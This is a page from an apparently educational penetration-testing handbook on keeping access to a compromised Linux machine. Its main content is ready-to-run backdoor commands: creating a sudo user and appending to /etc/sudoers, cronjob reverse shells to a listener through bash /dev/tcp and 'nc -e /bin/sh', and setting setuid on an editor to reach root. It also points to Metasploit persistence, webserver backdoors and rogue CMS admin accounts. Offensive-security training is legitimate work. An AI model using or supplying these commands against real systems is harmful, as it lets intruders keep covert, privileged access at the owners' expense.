SMK Muhammadiyah 2 Palembang
  • Introducation
  • The Basics
    • Basics of linux
    • Bash-scripting
    • Vim - Text Editor
    • Nano - Text Editor
  • Windows
    • Basics of windows
    • PowerShell
    • CMD - Windows commands
  • Scripting With Python
    • Python fundamentals
      • Useful Scripts
    • Transferring Files
      • Transferring Files on Linux
      • Transferring Files to Windows
    • Firewalls
  • Recon and Information Gathering Phase
    • Passive information gathering
    • Identify IP-addresses and Subdomains
      • Dorking Find Subdomains
      • Find Subdomains
      • DNS Basics
      • DNS Zone Transfer Attack
      • Identifying People
      • Search Engine Discovery
      • Active information gathering
      • Port Scanning
  • Vulnerability analysis
    • Server-side Vulnerabilities
      • Port knocking
    • HTTP - Web Vulnerabilities
      • Web-services
      • Common web-services
        • WAF - Web application firewall
          • WAF - Web application firewall
          • Attacking the System
          • Local File Inclusion (LFI)
          • Remote File Inclusion
          • Find hidden files and directories
          • SQL-injections
          • Nosql-injections
          • XML External Entity Attack
          • Bypass File Upload Filtering
          • Exposed Version Control
          • Failure to Restrict URL Access
    • Attacking the user
      • Clickjacking
      • Broken Authentication or Session Management
      • Text/content-injection
      • Subdomain Takeover
      • Cross Site Request Forgery
      • Cross-site-scripting
        • Examples
      • Browser vulnerabilities
      • Java applet
      • Automated Vulnerability Scanners
    • Exploiting
      • Social Engineering - Phishing
      • Default Layout of Apache on Different Versions
      • Shell
      • Webshell
      • Generate shellcode
      • Editing exploits
      • Compiling windows exploits
    • Post Exploitation
      • Spawning shells
      • Meterpreter shell for post-exploitation
      • Privilege Escalation
      • Privilege Escalation Windows
      • Escaping Restricted Shell
      • Bypassing antivirus
      • Loot and Enumerate
        • Loot Windows
        • Loot Linux
      • Persistence - Rootkit - Backdoor
      • Cover your tracks
  • Password Cracking
    • Generate custom wordlist
    • Offline password cracking
    • Online password cracking
    • Pass the hash - reusing hashes
  • Pivoting - Port forwarding - Tunneling
    • Pivoting
  • Network traffic
    • Arp-spoofing - Sniffing traffic
      • SSL-strip
    • DNS-spoofing
    • Wireshark
  • Wifi
    • WPS
    • WEP
  • Physical access to machine
  • Literature
Powered by GitBook
On this page
  • Create a new user
  • Crack the password of existing user
  • SSH key
  • Cronjob NC
  • Metasploit persistence module
  • Backdoor in webserver
  • Admin account to CMS
  • Mysql-backdoor
  • Hide backdoor in bootblock
  • Nmap
  • Setuid on text-editor
  • References
  1. Vulnerability analysis
  2. Post Exploitation

Persistence - Rootkit - Backdoor

So if you manage to compromise a system you need to make sure that you do not lose the shell. If you have used an exploit that messes with the machine the user might want to reboot, and if the user reboots you will lose your shell.

Or, maybe the way to compromise the machine is really complicated or noisy and you don't want to go through the hassle of doing it all again. So instead you just create a backdoor that you can enter fast and easy.

Create a new user

The most obvious, but not so subtle way is to just create a new user (if you are root, or someone with that privilege) .

adduser pelle
adduser pelle sudo

Now if the machine has ssh you will be able to ssh into the machine.

On some machines, older Linux I think, you have to do

useradd pelle
passwd pelle
echo "pelle    ALL=(ALL) ALL" >> /etc/sudoers

Crack the password of existing user

Get the /etc/shadow file and crack the passwords. This is of course only persistent until the user decides to change his/her password. So not so good.

SSH key

Add key to existing ssh-account.

Cronjob NC

Create cronjob that connects to your machine every 10 minutes. Here is an example using a bash-reverse-shell. You also need to set up a netcat listener.

Here is how you check if cronjob is active

service crond status
pgrep cron

If it is not started you can start it like this

service crond status
/etc/init.d/cron start
crontab -e
*/10 * * * * 0<&196;exec 196<>/dev/tcp/192.168.1.102/5556; sh <&196 >&196 2>&196
/10 * * * * nc -e /bin/sh 192.168.1.21 5556

Listener

nc -lvp 5556

Sometimes you have to set the user

crontab -e
*/10 * * * * pelle /path/to/binary

More here: http://kaoticcreations.blogspot.cl/2012/07/backdooring-unix-system-via-cron.html

Metasploit persistence module

Create a binary with malicious content inside. Run that, get meterpreter shell, run metasploit persistence.

https://www.offensive-security.com/metasploit-unleashed/binary-linux-trojan/

If you have a meterpreter shell you can easily just run persistence.

Backdoor in webserver

You can put a cmd or shell-backdoor in a webserver.

Put backdoor on webserver, either in separate file or in hidden in another file

Admin account to CMS

Add admin account to CMS.

Mysql-backdoor

Mysql backdoor

Hide backdoor in bootblock

Nmap

If the machine has nmap installed:

https://gist.github.com/dergachev/7916152

Setuid on text-editor

You can setuid on an editor. So if you can easily enter as a www-data, you can easily escalate to root through the editor.

With vi it is extremely easy. You just run :shell, and it gives you a shell.

# Make root the owner of the file
chown root myBinary

# set the sticky bit/suid
chmod u+s myBinary

References

Read this https://gist.github.com/dergachev/7916152

This is a creat introduction http://www.dankalia.com/tutor/01005/0100501002.htm

PreviousLoot LinuxNextCover your tracks

Last updated 2 years ago